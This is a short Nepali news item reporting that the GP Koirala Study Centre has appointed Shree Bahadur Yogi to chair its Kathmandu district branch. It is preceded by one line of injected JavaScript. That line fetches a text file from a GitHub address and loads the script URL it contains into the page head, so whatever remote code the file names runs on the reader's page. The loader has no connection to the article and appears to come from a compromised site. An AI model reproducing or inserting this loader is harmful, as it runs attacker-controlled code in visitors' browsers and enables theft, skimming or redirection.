;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
काठमाडौँ, जेठ १२। जि. पी कोइराला अध्ययन केन्द्रले आफ्नो शाखा विस्तार गर्ने क्रममा काठमाडौं जिल्ला शाखाको अध्यक्षमा श्री बहादुर योगीलाइ जिम्मेवारी दिएको छ गिरिजा प्रसाद कोइरालाले प्रजातान्त्रिक आन्दोलनमा गरेको योगदानको बारेमा नेपाली जन समुदाय बीच लैजाने हेतुले जि.पी कोइराला अध्ययन केन्द्र स्थापित भएको हो।
श्री बहादुर योगीले आफुलाइ प्रदान गरेको जिम्मेवारी संस्थाको बिधि बिधान अनुरुप रही सामाजिक काम र सेवामा लाग्ने बताएका छन । उनलाई मीति २०७७ जेठ १२ गते जि. पी कोइराला अध्ययन केन्द्रका अध्यक्ष राम प्रसाद अधिकारीले जिम्मेवारी प्रदान गरिएको पत्र हस्तान्तरण गरेका थिए ।
फेसबुक प्रतिक्रियाहरु